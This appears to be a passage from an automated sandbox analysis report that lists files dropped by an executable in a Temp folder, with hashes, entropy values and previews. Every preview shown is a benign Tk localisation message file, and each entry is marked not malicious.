                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset de "&Abort" "&Abbruch". ::msgcat::mcset de "&About..." "&\u00dcber...". ::msgcat::mcset de "All Files" "Alle Dateien". ::msgcat::mcset de "Application Error" "Applikationsfehler". ::msgcat::mcset de "&Apply" "&Anwenden". ::msgcat::mcset de "Bold" "Fett". ::msgcat::mcset de "Bold Italic" "Fett kursiv". ::msgcat::mcset de "&Blue" "&Blau". ::msgcat::mcset de "Cancel" "Abbruch". ::msgcat::mcset de "&Cancel" "&Abbruch". ::msgcat::mcset de "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kann nicht in das Verzeichnis \"%1\$s\" wechseln.\nKeine Rechte vorhanden.". ::msgcat::mcset de "Choose Directory" "W\u00e4hle Verzeichnis". ::msgcat::mcset de "Cl&ear" "&R\u00fccksetzen". ::msgcat::mcset de "&Clear Console" "&Konsole l\u00f6schen". ::msgcat::mcset de "Color" "Farbe". ::msgcat::mcset de "Console" "Konsole". ::msgcat::mcset de "&Copy" "&Kopieren". ::msgcat::mcset de "Cu&t" "Aus&schneid
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (355)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8698
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.296709418881547
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:tCrF5o/cmSHbkI8+ETnFI3mC2hk9I+c6M30UPfMNDz91yBFkm5w+kGR8MOFiL0xu:wp5RmSHlsFerVIfM5Loam5VOMAkV
                                                                                                                                                                                                                                                                                                                                MD5:C802EA5388476451CD76934417761AA6
                                                                                                                                                                                                                                                                                                                                SHA1:25531DF6262E3B1170055735C5A874B9124FEA83
                                                                                                                                                                                                                                                                                                                                SHA-256:1D56D0A7C07D34BB8165CBA47FA49351B8BC5A9DB244290B9601C5885D16155C
                                                                                                                                                                                                                                                                                                                                SHA-512:251FABBE8B596C74BC1231823C60F5F99CF55A29212327723F5DBE604F678E8E464F2D604D1049754B7C02350712B83BCF4D9542D8167F3CAB9C9B7E5C88EC7D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:## Messages for the Greek (Hellenic - "el") language..## Please report any changes/suggestions to:.## petasis@iit.demokritos.gr..namespace eval ::tk {. ::msgcat::mcset el "&Abort" "\u03a4\u03b5\u03c1\u03bc\u03b1\u03c4\u03b9\u03c3\u03bc\u03cc\u03c2". ::msgcat::mcset el "About..." "\u03a3\u03c7\u03b5\u03c4\u03b9\u03ba\u03ac...". ::msgcat::mcset el "All Files" "\u038c\u03bb\u03b1 \u03c4\u03b1 \u0391\u03c1\u03c7\u03b5\u03af\u03b1". ::msgcat::mcset el "Application Error" "\u039b\u03ac\u03b8\u03bf\u03c2 \u0395\u03c6\u03b1\u03c1\u03bc\u03bf\u03b3\u03ae\u03c2". ::msgcat::mcset el "&Blue" "\u039c\u03c0\u03bb\u03b5". ::msgcat::mcset el "&Cancel" "\u0391\u03ba\u03cd\u03c1\u03c9\u03c3\u03b7". ::msgcat::mcset el \."Cannot change to the directory \"%1\$s\".\nPermission denied." \."\u0394\u03b5\u03bd \u03b5\u03af\u03bd\u03b1\u03b9 \u03b4\u03c5\u03bd\u03b1\u03c4\u03ae \u03b7 \u03b1\u03bb\u03bb\u03b1\u03b3\u03ae \u03ba\u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3286
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.214322279125194
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:sqHa4IUXCtvLPgyq1+1ylnJzqFtC2NAXSxFFRRTDubLorIlnB:d64I5tDPgDNnH2SXSZRRTDuPZlB
                                                                                                                                                                                                                                                                                                                                MD5:64725ED622DBF1CB3F00479BA84157D7
                                                                                                                                                                                                                                                                                                                                SHA1:575429AEABAF6640425AC1BC397B3382C1ED1122
                                                                                                                                                                                                                                                                                                                                SHA-256:673C76A48ADA09A154CB038534BF90E3B9C0BA5FD6B1619DB33507DE65553362
                                                                                                                                                                                                                                                                                                                                SHA-512:4EBDCAB20D095789BB8D94476CCFD29DEE8DFCF96F1C2030387F0521827A140E22BBB0DAD4B73EABE26D70E1642C9981BC5CBBF0045FEABB9EF98C7CDB67795E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset en "&Abort". ::msgcat::mcset en "&About...". ::msgcat::mcset en "All Files". ::msgcat::mcset en "Application Error". ::msgcat::mcset en "&Apply". ::msgcat::mcset en "Bold". ::msgcat::mcset en "Bold Italic". ::msgcat::mcset en "&Blue". ::msgcat::mcset en "Cancel". ::msgcat::mcset en "&Cancel". ::msgcat::mcset en "Cannot change to the directory \"%1\$s\".\nPermission denied.". ::msgcat::mcset en "Choose Directory". ::msgcat::mcset en "Cl&ear". ::msgcat::mcset en "&Clear Console". ::msgcat::mcset en "Color". ::msgcat::mcset en "Console". ::msgcat::mcset en "&Copy". ::msgcat::mcset en "Cu&t". ::msgcat::mcset en "&Delete". ::msgcat::mcset en "Details >>". ::msgcat::mcset en "Directory \"%1\$s\" does not exist.". ::msgcat::mcset en "&Directory:". ::msgcat::mcset en "&Edit". ::msgcat::mcset en "Effects". ::msgcat::mcset en "Error: %1\$s". ::msgcat::mcset en "E&xit". ::msgcat
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):63
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.185724027617087
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:fEGp6fR1FAGoW8vMKEQXK:sooLoQO6
                                                                                                                                                                                                                                                                                                                                MD5:EC6A7E69AB0B8B767367DB54CC0499A8
                                                                                                                                                                                                                                                                                                                                SHA1:6C2D6B622429AB8C17E07C2E0F546469823ABE57
                                                                                                                                                                                                                                                                                                                                SHA-256:FB93D455A9D9CF3F822C968DFB273ED931E433F2494D71D6B5F8D83DDE7EACC2
                                                                                                                                                                                                                                                                                                                                SHA-512:72077EAB988979EB2EE292ACDB72537172A5E96B4262CE7278B76F0FEBD7E850D18221DB551D1DE3C6EB520985B5E9642936BEEB66032F920593276784525702
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset en_gb Color Colour.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3916
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.556739397782912
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:9714zhrzeU10xrFf+/eR0Mqp+cIFIXd/KcrtCcuUc6Sq4Pe:97145eFrF2GSMqgcIFIXdyAene
                                                                                                                                                                                                                                                                                                                                MD5:09EF4B30B49A71FD4DEA931E334896E1
                                                                                                                                                                                                                                                                                                                                SHA1:6C2366CE5961CFDA53259A43E087A813CEE41841
                                                                                                                                                                                                                                                                                                                                SHA-256:5DE113DC4CE0DF0D8C54D4812C15EC31387127BF9AFEA028D20C6A5AA8E3AB85
                                                                                                                                                                                                                                                                                                                                SHA-512:9DB3BB6B76B1299AE4612DF2A2872ECEE6642FC7DF971BE3A22437154AD25E81E1B1F3E1AA7A281CB3F48F8F8198A846BCB008CCFF91A9720440AFE5BAB7DE84
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset eo "&Abort" "&\u0108esigo". ::msgcat::mcset eo "&About..." "Pri...". ::msgcat::mcset eo "All Files" "\u0108ioj dosieroj". ::msgcat::mcset eo "Application Error" "Aplikoerraro". ::msgcat::mcset eo "&Blue" "&Blua". ::msgcat::mcset eo "Cancel" "Rezignu". ::msgcat::mcset eo "&Cancel" "&Rezignu". ::msgcat::mcset eo "Cannot change to the directory \"%1\$s\".\nPermission denied." "Neeble \u0109angi al dosierulon \"%1\$s\".\nVi ne rajtas tion.". ::msgcat::mcset eo "Choose Directory" "Elektu Dosierujo". ::msgcat::mcset eo "Cl&ear" "&Klaru". ::msgcat::mcset eo "&Clear Console" "&Klaru konzolon". ::msgcat::mcset eo "Color" "Farbo". ::msgcat::mcset eo "Console" "Konzolo". ::msgcat::mcset eo "&Copy" "&Kopiu". ::msgcat::mcset eo "Cu&t" "&Enpo\u015digu". ::msgcat::mcset eo "&Delete" "&Forprenu". ::msgcat::mcset eo "Details >>" "Detaloj >>". ::msgcat::mcset eo "Directory \"%1\$s\" does not exist." "La dosieruj
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3948
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.486102294561867
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:vTaZD2XRgGiWXirZe0uoH02QyTaBi2DcDmQ/jY33l4TCyFv:vmZaXhFbyGB3ELjDV
                                                                                                                                                                                                                                                                                                                                MD5:93FFA957E3DCF851DD7EBE587A38F2D5
                                                                                                                                                                                                                                                                                                                                SHA1:8C3516F79FB72F32848B40091DA67C81E40FDEFE
                                                                                                                                                                                                                                                                                                                                SHA-256:91DC4718DC8566C36E4BCD0C292C01F467CA7661EFF601B870ABCDFE4A94ECBB
                                                                                                                                                                                                                                                                                                                                SHA-512:8EC7048DDFF521DE444F697EAB305777BAC24AEA37716DA4FE5374E93CEF66DDD58D535BE8FCBCD2636D623337643B1242798BB8AC7292EA2D81AE030C3A605C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset es "&Abort" "&Abortar". ::msgcat::mcset es "&About..." "&Acerca de ...". ::msgcat::mcset es "All Files" "Todos los archivos". ::msgcat::mcset es "Application Error" "Error de la aplicaci\u00f3n". ::msgcat::mcset es "&Blue" "&Azul". ::msgcat::mcset es "Cancel" "Cancelar". ::msgcat::mcset es "&Cancel" "&Cancelar". ::msgcat::mcset es "Cannot change to the directory \"%1\$s\".\nPermission denied." "No es posible acceder al directorio \"%1\$s\".\nPermiso denegado.". ::msgcat::mcset es "Choose Directory" "Elegir directorio". ::msgcat::mcset es "Cl&ear" "&Borrar". ::msgcat::mcset es "&Clear Console" "&Borrar consola". ::msgcat::mcset es "Color". ::msgcat::mcset es "Console" "Consola". ::msgcat::mcset es "&Copy" "&Copiar". ::msgcat::mcset es "Cu&t" "Cor&tar". ::msgcat::mcset es "&Delete" "&Borrar". ::msgcat::mcset es "Details >>" "Detalles >>". ::msgcat::mcset es "Directory \"%1\$s\" does not exist." "
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3805
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.582498923493114
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:fiESNtfQIFBqFHjUp4KiOzbgRuhzSAEFlBGr3jd:fiESP1aVdKiHRXcN
                                                                                                                                                                                                                                                                                                                                MD5:9FC55235C334F6F6026D5B38AFFB9E10
                                                                                                                                                                                                                                                                                                                                SHA1:CAD3805900E860B9491E3EE5C2C0F52ADCA67065
                                                                                                                                                                                                                                                                                                                                SHA-256:0A8BBB4D1FD87BF7A90DDFA50F4724994C9CE78D1F3E91CF40C1177DB7941DC5
                                                                                                                                                                                                                                                                                                                                SHA-512:FBB5E72BC376DDB9F43B8C79398CA287AFAAAF8292A8CB3AF63241973B1748FD578D49075A1287DA054BA81D3ED61A723F3DE9E10855D5E85620B371D70D9BBD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset fr "&Abort" "&Annuler". ::msgcat::mcset fr "About..." "\u00c0 propos...". ::msgcat::mcset fr "All Files" "Tous les fichiers". ::msgcat::mcset fr "Application Error" "Erreur d'application". ::msgcat::mcset fr "&Blue" "&Bleu". ::msgcat::mcset fr "Cancel" "Annuler". ::msgcat::mcset fr "&Cancel" "&Annuler". ::msgcat::mcset fr "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossible d'acc\u00e9der au r\u00e9pertoire \"%1\$s\".\nPermission refus\u00e9e.". ::msgcat::mcset fr "Choose Directory" "Choisir r\u00e9pertoire". ::msgcat::mcset fr "Cl&ear" "Effacer". ::msgcat::mcset fr "Color" "Couleur". ::msgcat::mcset fr "Console". ::msgcat::mcset fr "Copy" "Copier". ::msgcat::mcset fr "Cu&t" "Couper". ::msgcat::mcset fr "Delete" "Effacer". ::msgcat::mcset fr "Details >>" "D\u00e9tails >>". ::msgcat::mcset fr "Directory \"%1\$s\" does not exist." "Le r\u00e9pertoire \"%1\$s\" n'existe pas.".
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4600
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.752507976327236
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:IYIzxGy0Kt9C81y/HSzVqUaJf9q/x5a/mETsN:IB1FCt/4vZM+EA
                                                                                                                                                                                                                                                                                                                                MD5:E1BA9C40A350BAD78611839A59065BF0
                                                                                                                                                                                                                                                                                                                                SHA1:1A148D230C9F8D748D96A79CD4E261AF264D6524
                                                                                                                                                                                                                                                                                                                                SHA-256:C8134EAD129E44E9C5043E1DAD81A6A900F0DE71DB3468E2603840038687F1D8
                                                                                                                                                                                                                                                                                                                                SHA-512:17EC7F14C708C4D8C77731C26D0CE8AF6EBAB3D1CA878FB9682F15F0546031E39EF601683832631CA329549A630F2C9A3A69B1CC6E3CC927353605834FC62CAE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset hu "&Abort" "&Megszak\u00edt\u00e1s". ::msgcat::mcset hu "&About..." "N\u00e9vjegy...". ::msgcat::mcset hu "All Files" "Minden f\u00e1jl". ::msgcat::mcset hu "Application Error" "Alkalmaz\u00e1s hiba". ::msgcat::mcset hu "&Blue" "&K\u00e9k". ::msgcat::mcset hu "Cancel" "M\u00e9gsem". ::msgcat::mcset hu "&Cancel" "M\u00e9g&sem". ::msgcat::mcset hu "Cannot change to the directory \"%1\$s\".\nPermission denied." "A k\u00f6nyvt\u00e1rv\u00e1lt\u00e1s nem siker\u00fclt: \"%1\$s\".\nHozz\u00e1f\u00e9r\u00e9s megtagadva.". ::msgcat::mcset hu "Choose Directory" "K\u00f6nyvt\u00e1r kiv\u00e1laszt\u00e1sa". ::msgcat::mcset hu "Cl&ear" "T\u00f6rl\u00e9s". ::msgcat::mcset hu "&Clear Console" "&T\u00f6rl\u00e9s Konzol". ::msgcat::mcset hu "Color" "Sz\u00edn". ::msgcat::mcset hu "Console" "Konzol". ::msgcat::mcset hu "&Copy" "&M\u00e1sol\u00e1s". ::msgcat::mcset hu "Cu&t" "&Kiv\u00e1g\u00e1s". ::msgcat::mcset hu "
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3692
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.444986253861924
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:rtcxronR9zvjZ3hWsH9TYT/dllvOr80nC2dnGHc839kUqg:xcxoXBhlHiT/dlcY0HpVg
                                                                                                                                                                                                                                                                                                                                MD5:ADB80EC5B23FC906A1A3313A30D789E6
                                                                                                                                                                                                                                                                                                                                SHA1:5FB163BC1086D3366228204078F219FE4BB67CB3
                                                                                                                                                                                                                                                                                                                                SHA-256:9F83DD0309ED621100F3187FFCDAE50B75F5973BBE74AF550A78EF0010495DED
                                                                                                                                                                                                                                                                                                                                SHA-512:BA6E0C165561CDAEAB565EF1FED4087AB3B41EC3C18432C1BDA9B011E5C7C2E12F6B2CFC9F5C0CFAC1134AE53D80459D8E5B638739C61A851232047DEA7F3BA2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset it "&Abort" "&Interrompi". ::msgcat::mcset it "&About..." "Informazioni...". ::msgcat::mcset it "All Files" "Tutti i file". ::msgcat::mcset it "Application Error" "Errore dell' applicazione". ::msgcat::mcset it "&Blue" "&Blu". ::msgcat::mcset it "Cancel" "Annulla". ::msgcat::mcset it "&Cancel" "&Annulla". ::msgcat::mcset it "Cannot change to the directory \"%1\$s\".\nPermission denied." "Impossibile accedere alla directory \"%1\$s\".\nPermesso negato.". ::msgcat::mcset it "Choose Directory" "Scegli una directory". ::msgcat::mcset it "Cl&ear" "Azzera". ::msgcat::mcset it "&Clear Console" "Azzera Console". ::msgcat::mcset it "Color" "Colore". ::msgcat::mcset it "Console". ::msgcat::mcset it "&Copy" "Copia". ::msgcat::mcset it "Cu&t" "Taglia". ::msgcat::mcset it "Delete" "Cancella". ::msgcat::mcset it "Details >>" "Dettagli >>". ::msgcat::mcset it "Directory \"%1\$s\" does not exist." "La director
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4466
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.472386382725933
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:791wMjS3Md15YNISfTMEu5KIXTLLBIafWUuvfbLnZj4gT7VT4k7BLyslwI6Blb4t:DVe3MX8ISUKYuXbLnZj4MRJhjSIO4t
                                                                                                                                                                                                                                                                                                                                MD5:B628EAFD489335ED620014B56821B792
                                                                                                                                                                                                                                                                                                                                SHA1:8F6AFF68B42B747D30870D6DA7E058294921406A
                                                                                                                                                                                                                                                                                                                                SHA-256:D3D07AAD792C0E83F4704B304931EA549D12CBB3D99A573D9815E954A5710707
                                                                                                                                                                                                                                                                                                                                SHA-512:C33D097D2897D20F75A197E30B859DC83C8B4E42F260150BC7205918779D77A8C2390BE65376622F6705C38ECDF6F14B6ABAD29EDE3DE79603025BBBC39BEBC7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset nl "&Abort" "&Afbreken". ::msgcat::mcset nl "&About..." "Over...". ::msgcat::mcset nl "All Files" "Alle Bestanden". ::msgcat::mcset nl "Application Error" "Toepassingsfout". ::msgcat::mcset nl "&Apply" "Toepassen". ::msgcat::mcset nl "Bold" "Vet". ::msgcat::mcset nl "Bold Italic" "Vet Cursief". ::msgcat::mcset nl "&Blue" "&Blauw". ::msgcat::mcset nl "Cancel" "Annuleren". ::msgcat::mcset nl "&Cancel" "&Annuleren". ::msgcat::mcset nl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan niet naar map \"%1\$s\" gaan.\nU heeft hiervoor geen toestemming.". ::msgcat::mcset nl "Choose Directory" "Kies map". ::msgcat::mcset nl "Cl&ear" "Wissen". ::msgcat::mcset nl "&Clear Console" "&Wis Console". ::msgcat::mcset nl "Color" "Kleur". ::msgcat::mcset nl "Console". ::msgcat::mcset nl "&Copy" "Kopi\u00ebren". ::msgcat::mcset nl "Cu&t" "Knippen". ::msgcat::mcset nl "&Delete" "Wissen". ::
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4841
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.754441208797498
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:mYpnddv1H+BBv5vVXKjB+y7ldBU63XQ3DGHolytTzEQdWaz0ybBaKG:zpdzH+3vLKnG63XdHoMpYYaL
                                                                                                                                                                                                                                                                                                                                MD5:17B63EFE0A99F44D27DD41C4CC0A8A7B
                                                                                                                                                                                                                                                                                                                                SHA1:3E45C0102B287908D770A31D1906678E785088C2
                                                                                                                                                                                                                                                                                                                                SHA-256:1993B4EC2DC009D2E6CA185D0BD565D3F33A4EFA79BACA39E4F97F574D63F305
                                                                                                                                                                                                                                                                                                                                SHA-512:F8B9E7BC76A4ED5F948A9E505F3B1A321E322DD57CF88BEF36B6A9AF793462E45432709402151B4BB520B12B089A043CA23FF86106ED7B5C73DFBB6E233907F4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset pl "&Abort" "&Przerwij". ::msgcat::mcset pl "&About..." "O programie...". ::msgcat::mcset pl "All Files" "Wszystkie pliki". ::msgcat::mcset pl "Application Error" "B\u0142\u0105d w programie". ::msgcat::mcset pl "&Apply" "Zastosuj". ::msgcat::mcset pl "Bold" "Pogrubienie". ::msgcat::mcset pl "Bold Italic" "Pogrubiona kursywa". ::msgcat::mcset pl "&Blue" "&Niebieski". ::msgcat::mcset pl "Cancel" "Anuluj". ::msgcat::mcset pl "&Cancel" "&Anuluj". ::msgcat::mcset pl "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nie mo\u017cna otworzy\u0107 katalogu \"%1\$s\".\nOdmowa dost\u0119pu.". ::msgcat::mcset pl "Choose Directory" "Wybierz katalog". ::msgcat::mcset pl "Cl&ear" "&Wyczy\u015b\u0107". ::msgcat::mcset pl "&Clear Console" "&Wyczy\u015b\u0107 konsol\u0119". ::msgcat::mcset pl "Color" "Kolor". ::msgcat::mcset pl "Console" "Konsola". ::msgcat::mcset pl "&Copy" "&Kopiuj". ::msgcat::
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3913
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5841256573492135
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:k82mOQNHHouc2Ib2dxwj0Hpn4KeJ4iFHh29wDPK8+i92M5L:k82mOenox2x5Hp47mi3ZUMB
                                                                                                                                                                                                                                                                                                                                MD5:236356817E391D8871EA59667F47DA0C
                                                                                                                                                                                                                                                                                                                                SHA1:948EE95F4549DA8C7D412911D17B4B62CBA22ADD
                                                                                                                                                                                                                                                                                                                                SHA-256:AD0E466131D3789DE321D9D0588E19E4647BA82EDE41EEE6EBEF464786F8BDBE
                                                                                                                                                                                                                                                                                                                                SHA-512:3AB10D1980D4C1367EA0BB54E50709DF32A870E851EDE80F30F66DA4B09C1ACFFF4E77C462BD815DD67F485DDFF77FEBD09CA29D77EEE55FE8A00D115D600C32
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset pt "&Abort" "&Abortar". ::msgcat::mcset pt "About..." "Sobre ...". ::msgcat::mcset pt "All Files" "Todos os arquivos". ::msgcat::mcset pt "Application Error" "Erro de aplica\u00e7\u00e3o". ::msgcat::mcset pt "&Blue" "&Azul". ::msgcat::mcset pt "Cancel" "Cancelar". ::msgcat::mcset pt "&Cancel" "&Cancelar". ::msgcat::mcset pt "Cannot change to the directory \"%1\$s\".\nPermission denied." "N\u00e3o foi poss\u00edvel mudar para o diret\u00f3rio \"%1\$s\".\nPermiss\u00e3o negada.". ::msgcat::mcset pt "Choose Directory" "Escolha um diret\u00f3rio". ::msgcat::mcset pt "Cl&ear" "Apagar". ::msgcat::mcset pt "&Clear Console" "Apagar Console". ::msgcat::mcset pt "Color" "Cor". ::msgcat::mcset pt "Console". ::msgcat::mcset pt "&Copy" "Copiar". ::msgcat::mcset pt "Cu&t" "Recortar". ::msgcat::mcset pt "&Delete" "Excluir". ::msgcat::mcset pt "Details >>" "Detalhes >>". ::msgcat::mcset pt "Directory \"%1\$s\"
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7214
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358559144448363
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:ZUEBGTT4Ys7LT3xXkhF2xSrwFlOzFAn9E/j49cDRqRjGSQvN8Nfo5hgV9aWTRtaa:SraFGImk+4RKOGqRyRu
                                                                                                                                                                                                                                                                                                                                MD5:D7C27DBDF7B349BE13E09F35BA61A5F8
                                                                                                                                                                                                                                                                                                                                SHA1:40A52544B557F19736EA1767BFBF5708A9BBC318
                                                                                                                                                                                                                                                                                                                                SHA-256:C863DEBAB79F9682FD0D52D864E328E7333D03F4E9A75DBB342C30807EFDCFFB
                                                                                                                                                                                                                                                                                                                                SHA-512:DAF10336096B0574F060757CB6DD24049692F81B969B01BB8FA212035D955B8DA53F5ECDE3613E6AEF3C47165F075CC14363E4B854B2407EA452EAB4D4D31955
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset ru "&Abort" "&\u041e\u0442\u043c\u0435\u043d\u0438\u0442\u044c". ::msgcat::mcset ru "&About..." "\u041f\u0440\u043e...". ::msgcat::mcset ru "All Files" "\u0412\u0441\u0435 \u0444\u0430\u0439\u043b\u044b". ::msgcat::mcset ru "Application Error" "\u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435". ::msgcat::mcset ru "&Blue" " &\u0413\u043e\u043b\u0443\u0431\u043e\u0439". ::msgcat::mcset ru "Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430". ::msgcat::mcset ru "&Cancel" "\u041e\u0442&\u043c\u0435\u043d\u0430". ::msgcat::mcset ru "Cannot change to the directory \"%1\$s\".\nPermission denied." \...."\u041d\u0435 \u043c\u043e\u0433\u0443 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 \"%1\$s\".\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0430\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u0430".
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3832
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.609382297476727
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:g4HXcfWBJdE10M4/00li6z8XIxTB2iDxypdmmZbWxOt:FXcf6H00li9IxTEbQsb7t
                                                                                                                                                                                                                                                                                                                                MD5:DB1712B1C1FF0E3A46F8E86FBB78AA4D
                                                                                                                                                                                                                                                                                                                                SHA1:28D9DB9CBEE791C09BD272D9C2A6C3DA80EB89EA
                                                                                                                                                                                                                                                                                                                                SHA-256:B76EBFA21BC1E937A04A04E5122BE64B5CDEE1F47C7058B71D8B923D70C3B17B
                                                                                                                                                                                                                                                                                                                                SHA-512:F79CD72DCD6D1B4212A5058DA5A020E8A157E72E6D84CAFB96463E76C1CED5AC367A2295EF743FDE70C9AB1CF2F4D88A4A73300DFD4F799AA3ECDA6FBF04E588
                                                                                                                                                                                                                                                                                                                                Malicious:false
